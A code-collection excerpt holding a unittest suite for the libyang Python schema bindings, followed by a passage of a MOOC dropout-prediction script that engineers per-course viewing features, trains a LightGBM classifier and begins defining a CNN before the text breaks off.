{
"source": "jiayinhaoran/libyang",
"score": 2
}
#### File: python/tests/test_schema.py
```python
import os
import unittest
from libyang import Context
from libyang.schema import Extension
from libyang.schema import IfFeature
from libyang.schema import IfOrFeatures
from libyang.schema import Module
from libyang.schema import Revision
from libyang.schema import SContainer
from libyang.schema import SLeaf
from libyang.schema import SLeafList
from libyang.schema import SList
from libyang.schema import SNode
from libyang.schema import SRpc
from libyang.schema import Type
from libyang.util import LibyangError
YANG_DIR = os.path.join(os.path.dirname(__file__), 'yang')
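# The tests below exercise the libyang Python bindings' schema API (modules,
# revisions, if-feature expressions, containers, lists, RPCs and leaf types)
# against the sample 'yolo-system' module located under YANG_DIR.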
#------------------------------------------------------------------------------
class ModuleTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
self.module = self.ctx.load_module('yolo-system')
def tearDown(self):
self.module = None
self.ctx.destroy()
self.ctx = None
def test_mod_print_mem(self):
s = self.module.print_mem('tree')
self.assertGreater(len(s), 0)
def test_mod_attrs(self):
self.assertEqual(self.module.name(), 'yolo-system')
self.assertEqual(self.module.description(), 'YOLO.')
self.assertEqual(self.module.prefix(), 'sys')
def test_mod_filepath(self):
self.assertEqual(self.module.filepath(),
os.path.join(YANG_DIR, 'yolo/yolo-system.yang'))
def test_mod_iter(self):
children = list(iter(self.module))
self.assertEqual(len(children), 4)
def test_mod_children_rpcs(self):
rpcs = list(self.module.children(types=(SNode.RPC,)))
self.assertEqual(len(rpcs), 2)
def test_mod_enable_features(self):
self.assertFalse(self.module.feature_state('turbo-boost'))
self.module.feature_enable('turbo-boost')
self.assertTrue(self.module.feature_state('turbo-boost'))
self.module.feature_disable('turbo-boost')
self.assertFalse(self.module.feature_state('turbo-boost'))
self.module.feature_enable_all()
self.assertTrue(self.module.feature_state('turbo-boost'))
self.module.feature_disable_all()
def test_mod_features(self):
features = list(self.module.features())
self.assertEqual(len(features), 2)
def test_mod_get_feature(self):
self.module.feature_enable('turbo-boost')
feature = self.module.get_feature('turbo-boost')
self.assertEqual(feature.name(), 'turbo-boost')
self.assertEqual(feature.description(), 'Goes faster.')
self.assertIsNone(feature.reference())
self.assertTrue(feature.state())
self.assertFalse(feature.deprecated())
self.assertFalse(feature.obsolete())
def test_mod_get_feature_not_found(self):
with self.assertRaises(LibyangError):
self.module.get_feature('does-not-exist')
def test_mod_revisions(self):
revisions = list(self.module.revisions())
self.assertEqual(len(revisions), 2)
self.assertIsInstance(revisions[0], Revision)
self.assertEqual(revisions[0].date(), '1999-04-01')
self.assertEqual(revisions[1].date(), '1990-04-01')
#------------------------------------------------------------------------------
class RevisionTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
mod = self.ctx.load_module('yolo-system')
revisions = list(mod.revisions())
self.revision = revisions[0]
def tearDown(self):
self.revision = None
self.ctx.destroy()
self.ctx = None
def test_rev_date(self):
self.assertEqual(self.revision.date(), '1999-04-01')
def test_rev_reference(self):
self.assertEqual(self.revision.reference(),
'RFC 2549 - IP over Avian Carriers with Quality of Service.')
def test_rev_description(self):
self.assertEqual(self.revision.description(), 'Version update.')
def test_rev_extensions(self):
exts = list(self.revision.extensions())
self.assertEqual(len(exts), 1)
ext = self.revision.get_extension('human-name', prefix='omg-extensions')
self.assertIsInstance(ext, Extension)
#------------------------------------------------------------------------------
class IfFeatureTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
mod = self.ctx.load_module('yolo-system')
mod.feature_enable_all()
self.leaf = next(self.ctx.find_path(
'/yolo-system:conf/yolo-system:isolation-level'))
def tearDown(self):
self.container = None
self.ctx.destroy()
self.ctx = None
def test_iffeatures(self):
iffeatures = list(self.leaf.if_features())
self.assertEqual(len(iffeatures), 1)
def test_iffeature_tree(self):
iff = next(self.leaf.if_features())
tree = iff.tree()
self.assertIsInstance(tree, IfOrFeatures)
self.assertIsInstance(tree.a, IfFeature)
self.assertIsInstance(tree.b, IfFeature)
self.assertEqual(tree.a.feature().name(), 'turbo-boost')
self.assertEqual(tree.b.feature().name(), 'networking')
def test_iffeature_str(self):
iff = next(self.leaf.if_features())
self.assertEqual(str(iff), 'turbo-boost OR networking')
def test_iffeature_dump(self):
iff = next(self.leaf.if_features())
self.assertEqual(iff.dump(), '''OR
turbo-boost [Goes faster.]
networking [Supports networking.]
''')
#------------------------------------------------------------------------------
class ContainerTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
mod = self.ctx.load_module('yolo-system')
mod.feature_enable_all()
self.container = next(self.ctx.find_path('/yolo-system:conf'))
def tearDown(self):
self.container = None
self.ctx.destroy()
self.ctx = None
def test_cont_attrs(self):
self.assertIsInstance(self.container, SContainer)
self.assertEqual(self.container.nodetype(), SNode.CONTAINER)
self.assertEqual(self.container.keyword(), 'container')
self.assertEqual(self.container.name(), 'conf')
self.assertEqual(self.container.fullname(), 'yolo-system:conf')
self.assertEqual(self.container.description(), 'Configuration.')
self.assertEqual(self.container.config_set(), False)
self.assertEqual(self.container.config_false(), False)
self.assertEqual(self.container.mandatory(), False)
self.assertIsInstance(self.container.module(), Module)
self.assertEqual(self.container.schema_path(), '/yolo-system:conf')
self.assertEqual(self.container.data_path(), '/yolo-system:conf')
self.assertIs(self.container.presence(), None)
def test_cont_iter(self):
children = list(iter(self.container))
self.assertEqual(len(children), 7)
def test_cont_children_leafs(self):
leafs = list(self.container.children(types=(SNode.LEAF,)))
self.assertEqual(len(leafs), 5)
def test_cont_parent(self):
self.assertIsNone(self.container.parent())
#------------------------------------------------------------------------------
class ListTest(unittest.TestCase):
SCHEMA_PATH = '/yolo-system:conf/yolo-system:url'
DATA_PATH = "/yolo-system:conf/url[proto='%s'][host='%s']"
def setUp(self):
self.ctx = Context(YANG_DIR)
self.ctx.load_module('yolo-system')
self.list = next(self.ctx.find_path(self.SCHEMA_PATH))
def tearDown(self):
self.list = None
self.ctx.destroy()
self.ctx = None
def test_list_attrs(self):
self.assertIsInstance(self.list, SList)
self.assertEqual(self.list.nodetype(), SNode.LIST)
self.assertEqual(self.list.keyword(), 'list')
self.assertEqual(self.list.schema_path(), self.SCHEMA_PATH)
self.assertEqual(self.list.data_path(), self.DATA_PATH)
self.assertFalse(self.list.ordered())
def test_list_keys(self):
keys = list(self.list.keys())
self.assertEqual(len(keys), 2)
def test_list_iter(self):
children = list(iter(self.list))
self.assertEqual(len(children), 5)
def test_list_children_skip_keys(self):
children = list(self.list.children(skip_keys=True))
self.assertEqual(len(children), 3)
def test_list_parent(self):
parent = self.list.parent()
self.assertIsNotNone(parent)
self.assertIsInstance(parent, SContainer)
self.assertEqual(parent.name(), 'conf')
#------------------------------------------------------------------------------
class RpcTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
self.ctx.load_module('yolo-system')
self.rpc = next(self.ctx.find_path('/yolo-system:format-disk'))
def tearDown(self):
self.rpc = None
self.ctx.destroy()
self.ctx = None
def test_rpc_attrs(self):
self.assertIsInstance(self.rpc, SRpc)
self.assertEqual(self.rpc.nodetype(), SNode.RPC)
self.assertEqual(self.rpc.keyword(), 'rpc')
self.assertEqual(self.rpc.schema_path(), '/yolo-system:format-disk')
def test_rpc_extensions(self):
ext = list(self.rpc.extensions())
self.assertEqual(len(ext), 1)
ext = self.rpc.get_extension('require-admin', prefix='omg-extensions')
self.assertIsInstance(ext, Extension)
def test_rpc_params(self):
leaf = next(self.rpc.children())
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.data_path(), '/yolo-system:format-disk/disk')
leaf = next(self.rpc.input().children())
self.assertIsInstance(leaf, SLeaf)
def test_rpc_no_parent(self):
self.assertIsNone(self.rpc.parent())
#------------------------------------------------------------------------------
class LeafTypeTest(unittest.TestCase):
def setUp(self):
self.ctx = Context(YANG_DIR)
self.ctx.load_module('yolo-system')
def tearDown(self):
self.ctx.destroy()
self.ctx = None
def test_leaf_type_derived(self):
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:hostname'))
self.assertIsInstance(leaf, SLeaf)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'host')
self.assertEqual(t.base(), Type.STRING)
d = t.derived_type()
self.assertEqual(d.name(), 'str')
dd = d.derived_type()
self.assertEqual(dd.name(), 'string')
def test_leaf_type_status(self):
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:hostname'))
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.deprecated(), False)
self.assertEqual(leaf.obsolete(), False)
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:deprecated-leaf'))
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.deprecated(), True)
self.assertEqual(leaf.obsolete(), False)
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:obsolete-leaf'))
self.assertIsInstance(leaf, SLeaf)
self.assertEqual(leaf.deprecated(), False)
self.assertEqual(leaf.obsolete(), True)
def test_leaf_type_union(self):
leaf = next(self.ctx.find_path('/yolo-system:conf/yolo-system:number'))
self.assertIsInstance(leaf, SLeafList)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'number')
self.assertEqual(t.base(), Type.UNION)
types = set(u.name() for u in t.union_types())
self.assertEqual(types, set(['signed', 'unsigned']))
bases = set(t.basenames())
self.assertEqual(bases, set(['int16', 'int32', 'uint16', 'uint32']))
def test_leaf_type_enum(self):
leaf = next(self.ctx.find_path(
'/yolo-system:conf/yolo-system:url/yolo-system:proto'))
self.assertIsInstance(leaf, SLeaf)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'protocol')
self.assertEqual(t.base(), Type.ENUM)
enums = [e for e, _ in t.enums()]
self.assertEqual(enums, ['http', 'https', 'ftp', 'sftp', 'tftp'])
def test_leaf_type_bits(self):
leaf = next(self.ctx.find_path(
'/yolo-system:chmod/yolo-system:input/yolo-system:perms'))
self.assertIsInstance(leaf, SLeaf)
t = leaf.type()
self.assertIsInstance(t, Type)
self.assertEqual(t.name(), 'permissions')
self.assertEqual(t.base(), Type.BITS)
bits = [b for b, _ in t.bits()]
self.assertEqual(bits, ['read', 'write', 'execute'])
def test_leaf_parent(self):
leaf = next(self.ctx.find_path(
'/yolo-system:conf/yolo-system:url/yolo-system:proto'))
parent = leaf.parent()
self.assertIsNotNone(parent)
self.assertIsInstance(parent, SList)
self.assertEqual(parent.name(), 'url')
```
{
"source": "JiayinL/Dropout-Prediction",
"score": 2
}
#### File: JiayinL/Dropout-Prediction/gdbt_cnn.py
```python
from lightgbm import LGBMClassifier
import pandas as pd
import pandas_profiling
from sklearn.preprocessing import LabelEncoder
from tqdm import tqdm
from joblib import Parallel, delayed
import numpy as np
import re
import time
import json
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import torch.nn.utils.rnn as rnn_utils
from sklearn.utils import shuffle
import catboost
from catboost import CatBoostClassifier, Pool, cv
from sklearn.metrics import f1_score
from sklearn.metrics import roc_auc_score
# register tqdm with pandas so that the progress_apply() calls below work
tqdm.pandas()
def time_transform(t):
    # parse the timestamp string into a time struct
    timeArray = time.strptime(t, "%Y-%m-%d %H:%M:%S")
    # convert the time struct into a unix timestamp (seconds)
    timeStamp = int(time.mktime(timeArray))
    return timeStamp
def Z_score(mean_, std_,x):
return (x-mean_)/std_
def max_mean_std(data):
return np.max(data), np.mean(data), np.std(data)
def calculate_acc(predictions, truth):
hit = 0
for i in range(len(predictions)):
if predictions[i] == truth[i]:
hit = hit +1
return hit/len(predictions)
train_set = pd.read_csv('train_set.csv',converters={'label_list': eval})
test_set = pd.read_csv('test_set_course_vec.csv',converters={'label_list': eval, 'course_vecs_CNN':eval, 'course_vecs_LR':eval})
course_info = pd.read_json('course_info.json',lines=True) #706 courses
video_info = pd.read_json('video_info.json',lines=True) #38181 videos
videoID = video_info['id'].values.tolist()
courseID = course_info['course_id'].values.tolist()
videoID_encoder = LabelEncoder()
courseID_encoder = LabelEncoder()
videoID_encoder.fit(videoID)
courseID_encoder.fit(courseID)
course_info['courseID'] = course_info['course_id'].progress_apply(lambda x : courseID_encoder.transform([x]))
course_info['videoIDs'] = course_info['item'].progress_apply(lambda x : videoID_encoder.transform(x))
course_video_num = {}
def count_videos(courseId, videoIds):
number_of_video = len(videoIds)
course_video_num[courseId[0]] = number_of_video
course_info.progress_apply(lambda row: count_videos(row['courseID'],row['videoIDs']), axis=1)
course_frequence= {}
frequence_list = []
course_ids = course_info['courseID'].values.tolist()
course_ids =[ item for elem in course_ids for item in elem] #706 courses
for i in range(len(course_ids)):
course_frequence[course_ids[i]]=0
# course_frequence[470]
def course_frequence_calculate(courseListIDs):
    courseListIDs = re.sub(r'\s+', ' ', courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
for i in range(len(courses_)):
num = course_frequence[courses_[i]] +1
course_frequence[courses_[i]] = num
train_set['courseListIDs'].progress_apply(lambda x : course_frequence_calculate(x))
for k,v in course_frequence.items():
frequence_list.append(v)
max_course_frequence, mean_course_frequence, std_course_frequence = max_mean_std(frequence_list)
video_start_times_info = []
video_end_times_info = []
local_start_times_info = []
local_end_times_info = []
video_durations_info = []
local_watching_times_info = []
video_progress_times_info = []
watching_counts_info = []
local_interval_info = []
video_duration ={}
def collect_info(course_ids,video_ids,watching_counts,video_durations,local_watching_times,video_progress_times,
video_start_times, video_end_times, local_start_times,local_end_times,courseListIDs):
course_ids = eval(course_ids)
video_ids = eval(video_ids)
watching_counts = eval(watching_counts)
video_durations = eval(video_durations)
local_watching_times = eval(local_watching_times)
video_progress_times = eval(video_progress_times)
video_start_times = eval(video_start_times)
video_end_times = eval(video_end_times)
local_start_times = eval(local_start_times)
local_end_times = eval(local_end_times)
    courseListIDs = re.sub(r'\s+', ' ', courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
courses = {}
courses_textual_content = {}
courses_textual_name = {}
for i in range(len(courses_)):
courses[courses_[i]] = []
for i in range(len(course_ids)):
course = course_ids[i]
local_start_times_ = time_transform(local_start_times[i])
local_end_times_ = time_transform(local_end_times[i])
interval = local_end_times_ - local_start_times_
video_start_times_info.append(video_start_times[i])
video_end_times_info.append(video_end_times[i])
local_start_times_info.append(local_start_times_)
local_end_times_info.append(local_end_times_)
video_durations_info.append(video_durations[i])
video_duration[video_ids[i]] = video_durations[i]
local_watching_times_info.append(local_watching_times[i])
video_progress_times_info.append(video_progress_times[i])
watching_counts_info.append(watching_counts[i])
local_interval_info.append(interval)
train_set.progress_apply(lambda row: collect_info(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
# global statistics
std_local_start_times_info = np.std(local_start_times_info, ddof=1)
mean_local_start_times_info = np.mean(local_start_times_info)
std_video_start_times_info = np.std(video_start_times_info, ddof=1)
mean_video_start_times_info = np.mean(video_start_times_info)
std_video_end_times_info = np.std(video_end_times_info, ddof=1)
mean_video_end_times_info = np.mean(video_end_times_info)
std_local_end_times_info = np.std(local_end_times_info, ddof=1)
mean_local_end_times_info = np.mean(local_end_times_info)
std_video_durations_info = np.std(video_durations_info, ddof=1)
mean_video_durations_info = np.mean(video_durations_info)
std_local_watching_times_info = np.std(local_watching_times_info, ddof=1)
mean_local_watching_times_info = np.mean(local_watching_times_info)
std_video_progress_times_info = np.std(video_progress_times_info, ddof=1)
mean_video_progress_times_info = np.mean(video_progress_times_info)
std_watching_counts_info = np.std(watching_counts_info, ddof=1)
mean_watching_counts_info = np.mean(watching_counts_info)
std_local_interval_info = np.std(local_interval_info, ddof=1)
mean_local_interval_info = np.mean(local_interval_info)
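# The module-level means/standard deviations above are computed once over the
# whole training set and reused below to z-score per-session features inside
# feature_genration() and gbdt_prediction().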
def feature_genration(course_ids,video_ids,watching_counts,video_durations,local_watching_times,video_progress_times,
video_start_times, video_end_times, local_start_times,local_end_times,courseListIDs):
course_ids = eval(course_ids)
video_ids = eval(video_ids)
watching_counts = eval(watching_counts)
video_durations = eval(video_durations)
local_watching_times = eval(local_watching_times)
video_progress_times = eval(video_progress_times)
video_start_times = eval(video_start_times)
video_end_times = eval(video_end_times)
local_start_times = eval(local_start_times)
local_end_times = eval(local_end_times)
unix_start_time = [time_transform(i) for i in local_start_times]
unix_end_time = [time_transform(i) for i in local_end_times]
unix_interval = [unix_end_time[i] - unix_start_time[i] for i in range(len(unix_start_time))]
z_score_local_start_time = [Z_score(mean_local_start_times_info,std_local_start_times_info,i) for i in unix_start_time]
z_score_local_end_time = [Z_score(mean_local_end_times_info,std_local_end_times_info,i) for i in unix_end_time]
z_score_interval = [Z_score(mean_local_interval_info,std_local_interval_info,i) for i in unix_interval]
    courseListIDs = re.sub(r'\s+', ' ', courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
courses = {}
for i in range(len(courses_)):
courses[courses_[i]] = []
# courses_textual_name[courses_[i]] = []
# courses_textual_content[courses_[i]] = []
for i in range(len(course_ids)):
course = course_ids[i]
info_vec = [course_ids[i],watching_counts[i],video_durations[i],local_watching_times[i],video_progress_times[i],
video_start_times[i], video_end_times[i],z_score_interval[i],z_score_local_start_time[i],z_score_local_end_time[i]]
courses[course].append(info_vec)
course_vec = []
for i in range(len(courses_)):
info_vecs = courses[courses_[i]]
total_video_num = course_video_num[courses_[i]]
num_of_vdo = len(info_vecs)
percentage_viewed = num_of_vdo/total_video_num
num_of_cos = len(courses_)
course_watching_counts = [info_vecs[j][1] for j in range(len(info_vecs))]
course_time_per_watching = [info_vecs[j][3]/info_vecs[j][1] for j in range(len(info_vecs))]
course_video_durations = [info_vecs[j][2] for j in range(len(info_vecs))]
course_local_watching_times = [info_vecs[j][3] for j in range(len(info_vecs))]
course_video_progress_times = [info_vecs[j][4] for j in range(len(info_vecs))]
course_video_watching_speed = [info_vecs[j][3]/info_vecs[j][4] for j in range(len(info_vecs))]
course_video_start_times = [info_vecs[j][5] for j in range(len(info_vecs))]
course_video_end_times = [info_vecs[j][6] for j in range(len(info_vecs))]
course_z_score_interval = [info_vecs[j][7] for j in range(len(info_vecs))]
course_z_score_local_start_time =[info_vecs[j][8] for j in range(len(info_vecs))]
course_z_score_local_end_time =[info_vecs[j][9] for j in range(len(info_vecs))]
max_watching_counts, mean_watching_counts, std_watching_counts = max_mean_std(course_watching_counts)
max_video_durations, mean_video_durations, std_video_durations = max_mean_std(course_video_durations)
max_local_watching_times, mean_local_watching_times, std_local_watching_times = max_mean_std(course_local_watching_times)
max_video_progress_times, mean_video_progress_times, std_video_progress_times = max_mean_std(course_video_progress_times)
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed = max_mean_std(course_video_watching_speed)
max_video_start_times, mean_video_start_times, std_video_start_times = max_mean_std(course_video_start_times)
max_video_end_times, mean_video_end_times, std_video_end_times = max_mean_std(course_video_end_times)
max_z_score_interval, mean_z_score_interval, std_z_score_interval = max_mean_std(course_z_score_interval)
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time = max_mean_std(course_z_score_local_start_time)
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time = max_mean_std(course_z_score_local_end_time)
max_time_per_watching, mean_time_per_watching, std_time_per_watching = max_mean_std(course_time_per_watching)
    # compared to global statistics
# mean_watching_counts_ratio = mean_watching_counts/mean_watching_counts_info
# mean_video_durations_ratio = mean_video_durations/mean_video_durations_info
# mean_local_watching_times_ratio = mean_local_watching_times/mean_local_watching_times_info
# mean_watching_speed_ratio = mean_video_watching_speed/(mean_local_watching_times_info/mean_video_progress_times_info)
# std_watching_counts_ratio = std_watching_counts/std_watching_counts_info
# std_video_durations_ratio = std_video_durations/std_video_durations_info
# std_local_watching_times_ratio = std_local_watching_times/std_local_watching_times_info
# std_watching_speed_ratio = std_video_watching_speed/(std_local_watching_times_info/std_video_progress_times_info)
course_frequence_z_score = Z_score(mean_course_frequence,std_course_frequence,course_frequence[courses_[i]])
total_watching_counts = np.sum(course_watching_counts)
total_video_durations = np.sum(course_video_durations)
total_local_watching_times = np.sum(course_local_watching_times)
total_video_progress_times = np.sum(course_video_progress_times)
vec = [courses_[i],num_of_cos,num_of_vdo,max_watching_counts, mean_watching_counts, std_watching_counts,
max_video_durations, mean_video_durations, std_video_durations,
max_local_watching_times, mean_local_watching_times, std_local_watching_times,
max_video_progress_times, mean_video_progress_times, std_video_progress_times,
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed,
max_video_start_times, mean_video_start_times, std_video_start_times,
max_video_end_times, mean_video_end_times, std_video_end_times,
max_z_score_interval, mean_z_score_interval, std_z_score_interval,
total_video_num, percentage_viewed,
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time,
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time,
# mean_watching_counts_ratio,mean_video_durations_ratio,mean_local_watching_times_ratio,mean_watching_speed_ratio,
# std_watching_counts_ratio,std_video_durations_ratio,std_local_watching_times_ratio,std_watching_speed_ratio
course_frequence_z_score,max_time_per_watching, mean_time_per_watching, std_time_per_watching,
total_watching_counts,total_video_durations,total_local_watching_times,total_video_progress_times
]
course_vec.append(vec)
return course_vec
def gbdt_prediction(course_ids,video_ids,watching_counts,video_durations,local_watching_times,video_progress_times,
video_start_times, video_end_times, local_start_times,local_end_times,courseListIDs):
course_ids = eval(course_ids)
video_ids = eval(video_ids)
watching_counts = eval(watching_counts)
video_durations = eval(video_durations)
local_watching_times = eval(local_watching_times)
video_progress_times = eval(video_progress_times)
video_start_times = eval(video_start_times)
video_end_times = eval(video_end_times)
local_start_times = eval(local_start_times)
local_end_times = eval(local_end_times)
unix_start_time = [time_transform(i) for i in local_start_times]
unix_end_time = [time_transform(i) for i in local_end_times]
unix_interval = [unix_end_time[i] - unix_start_time[i] for i in range(len(unix_start_time))]
z_score_local_start_time = [Z_score(mean_local_start_times_info,std_local_start_times_info,i) for i in unix_start_time]
z_score_local_end_time = [Z_score(mean_local_end_times_info,std_local_end_times_info,i) for i in unix_end_time]
z_score_interval = [Z_score(mean_local_interval_info,std_local_interval_info,i) for i in unix_interval]
    courseListIDs = re.sub(r'\s+', ' ', courseListIDs[1:-1].strip(' '))
courses_ = [int(i) for i in courseListIDs.split(' ')]
courses = {}
for i in range(len(courses_)):
courses[courses_[i]] = []
# courses_textual_name[courses_[i]] = []
# courses_textual_content[courses_[i]] = []
for i in range(len(course_ids)):
course = course_ids[i]
info_vec = [course_ids[i],watching_counts[i],video_durations[i],local_watching_times[i],video_progress_times[i],
video_start_times[i], video_end_times[i],z_score_interval[i],z_score_local_start_time[i],z_score_local_end_time[i]]
courses[course].append(info_vec)
course_vec = []
for i in range(len(courses_)):
info_vecs = courses[courses_[i]]
total_video_num = course_video_num[courses_[i]]
num_of_vdo = len(info_vecs)
percentage_viewed = num_of_vdo/total_video_num
num_of_cos = len(courses_)
course_watching_counts = [info_vecs[j][1] for j in range(len(info_vecs))]
course_time_per_watching = [info_vecs[j][3]/info_vecs[j][1] for j in range(len(info_vecs))]
course_video_durations = [info_vecs[j][2] for j in range(len(info_vecs))]
course_local_watching_times = [info_vecs[j][3] for j in range(len(info_vecs))]
course_video_progress_times = [info_vecs[j][4] for j in range(len(info_vecs))]
course_video_watching_speed = [info_vecs[j][3]/info_vecs[j][4] for j in range(len(info_vecs))]
course_video_start_times = [info_vecs[j][5] for j in range(len(info_vecs))]
course_video_end_times = [info_vecs[j][6] for j in range(len(info_vecs))]
course_z_score_interval = [info_vecs[j][7] for j in range(len(info_vecs))]
course_z_score_local_start_time =[info_vecs[j][8] for j in range(len(info_vecs))]
course_z_score_local_end_time =[info_vecs[j][9] for j in range(len(info_vecs))]
max_watching_counts, mean_watching_counts, std_watching_counts = max_mean_std(course_watching_counts)
max_video_durations, mean_video_durations, std_video_durations = max_mean_std(course_video_durations)
max_local_watching_times, mean_local_watching_times, std_local_watching_times = max_mean_std(course_local_watching_times)
max_video_progress_times, mean_video_progress_times, std_video_progress_times = max_mean_std(course_video_progress_times)
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed = max_mean_std(course_video_watching_speed)
max_video_start_times, mean_video_start_times, std_video_start_times = max_mean_std(course_video_start_times)
max_video_end_times, mean_video_end_times, std_video_end_times = max_mean_std(course_video_end_times)
max_z_score_interval, mean_z_score_interval, std_z_score_interval = max_mean_std(course_z_score_interval)
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time = max_mean_std(course_z_score_local_start_time)
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time = max_mean_std(course_z_score_local_end_time)
max_time_per_watching, mean_time_per_watching, std_time_per_watching = max_mean_std(course_time_per_watching)
    # compared to global statistics
course_frequence_z_score = Z_score(mean_course_frequence,std_course_frequence,course_frequence[courses_[i]])
total_watching_counts = np.sum(course_watching_counts)
total_video_durations = np.sum(course_video_durations)
total_local_watching_times = np.sum(course_local_watching_times)
total_video_progress_times = np.sum(course_video_progress_times)
vec = [courses_[i],num_of_cos,num_of_vdo,max_watching_counts, mean_watching_counts, std_watching_counts,
max_video_durations, mean_video_durations, std_video_durations,
max_local_watching_times, mean_local_watching_times, std_local_watching_times,
max_video_progress_times, mean_video_progress_times, std_video_progress_times,
max_video_watching_speed, mean_video_watching_speed, std_video_watching_speed,
max_video_start_times, mean_video_start_times, std_video_start_times,
max_video_end_times, mean_video_end_times, std_video_end_times,
max_z_score_interval, mean_z_score_interval, std_z_score_interval,
total_video_num, percentage_viewed,
max_z_score_local_start_time, mean_z_score_local_start_time, std_z_score_local_start_time,
max_z_score_local_end_time, mean_z_score_local_end_time, std_z_score_local_end_time,
# mean_watching_counts_ratio,mean_video_durations_ratio,mean_local_watching_times_ratio,mean_watching_speed_ratio,
# std_watching_counts_ratio,std_video_durations_ratio,std_local_watching_times_ratio,std_watching_speed_ratio
course_frequence_z_score,max_time_per_watching, mean_time_per_watching, std_time_per_watching,
total_watching_counts,total_video_durations,total_local_watching_times,total_video_progress_times
]
course_vec.append(vec)
r_lightGBM = model_lgb.predict_proba(course_vec).tolist()
r1 = []
for i in range(len(r_lightGBM)):
r1.append(r_lightGBM[i][1])
# r = model_lgb.predict(course_vec).tolist()
# r = catboost_model.predict(course_vec).tolist()
return r1
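# gbdt_prediction() rebuilds the same per-course feature vectors as
# feature_genration() and feeds them to the fitted LightGBM model (model_lgb),
# returning the positive-class probability for each of the user's courses.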
train_set['course_vecs2'] = train_set.progress_apply(lambda row: feature_genration(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
data = train_set[['label_list','course_vecs2']]
labels = data['label_list'].values.tolist()
y = [ item for elem in labels for item in elem]
course_info = data['course_vecs2'].values.tolist()
course_list = [ item for elem in course_info for item in elem]
model_lgb = LGBMClassifier(boosting_type='gbdt', num_leaves=64, learning_rate=0.01, n_estimators=2000,
max_bin=425, subsample_for_bin=50000, objective='binary', min_split_gain=0,
min_child_weight=5, min_child_samples=10, subsample=0.8, subsample_freq=1,
colsample_bytree=1, reg_alpha=3, reg_lambda=5, seed=1000, n_jobs=-1, silent=True)
model_lgb.fit(course_list, y,
eval_names=['train'],
eval_metric=['logloss','auc'],
eval_set=[(course_list, y)],
early_stopping_rounds=10)
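# Note: eval_set above is the training data itself, so the reported logloss/AUC
# and the early-stopping signal are measured on the training set.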
#test data prep
test_set['course_vecs2'] = test_set.progress_apply(lambda row: feature_genration(row['course_ids'],row['video_ids'],row['watching_counts'],row['video_durations'],row['local_watching_times'],row['video_progress_times'],
row['video_start_times'], row['video_end_times'], row['local_start_times'],row['local_end_times'],row['courseListIDs']), axis=1)
test_data = test_set[['label_list','course_vecs2']]
test_labels = test_data['label_list'].values.tolist()
ground_truth = [ item for elem in test_labels for item in elem]
course_info_test = test_data['course_vecs2'].values.tolist()
course_list_test = [ item for elem in course_info_test for item in elem]
result2 = model_lgb.predict(course_list_test)
result2 =result2.tolist()
acc = calculate_acc(result2,ground_truth)
nb_courses = 706+1
course_emb_size = 5
nb_videos = 38181+1
video_emb_size = 15
feature_size1 = course_emb_size + 42
sequence_len = 70
feature_size2 = course_emb_size + video_emb_size + 13
num_out_channel = 32
kernel_size = [3,4,5]
output_size = 32
hidden_dim = 64
num_of_lstm_layer = 1
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.course_embedding = torch.nn.Embedding(nb_courses, course_emb_size)
self.video_embedding = torch.nn.Embedding(nb_videos, video_emb_size)
self.ReLU_activation = nn.ReLU()
self.tanh_activation = nn.Tanh()
self.conv1 = nn.Conv1d(in_channels=feature_size2,out_channels=num_out_channel,kernel_size=kernel_size[0])
self.maxpool1 = nn.MaxPool1d(sequence_len - kernel_size[0] + 1)
self.conv2 = nn.Conv1d(in_channels=feature_size2,out_channels=num_out_channel,kernel_size=kernel_size[1])
self.maxpool2 = nn.MaxPool1d(sequence_len - kernel_size[1] + 1)
self.conv3 = nn.Conv1d(in_channels=feature_size2,out_channels=num_out_channel,kernel_size=kernel_size[2])
self.maxpool3 = nn.MaxPool1d(sequence_len - kernel_size[2] + 1)
self.fc1 = nn.Linear(num_out_channel*len(kernel_size), 64)
self.fc2 = nn.Linear(64, 16)
self.fc3 = nn.Linear(16, 1)
# self.softmax = nn.Softmax()
self.sigmoid = nn.Sigmoid()
def forward(self, course_id, video_id, continues):
#course_id (batch_size, max_sen_len)
#continues (batch_size, max_sen_len, feature_size)
emb1 = self.course_embedding(course_id) # (batch_size,max_sen_len, embed_size)
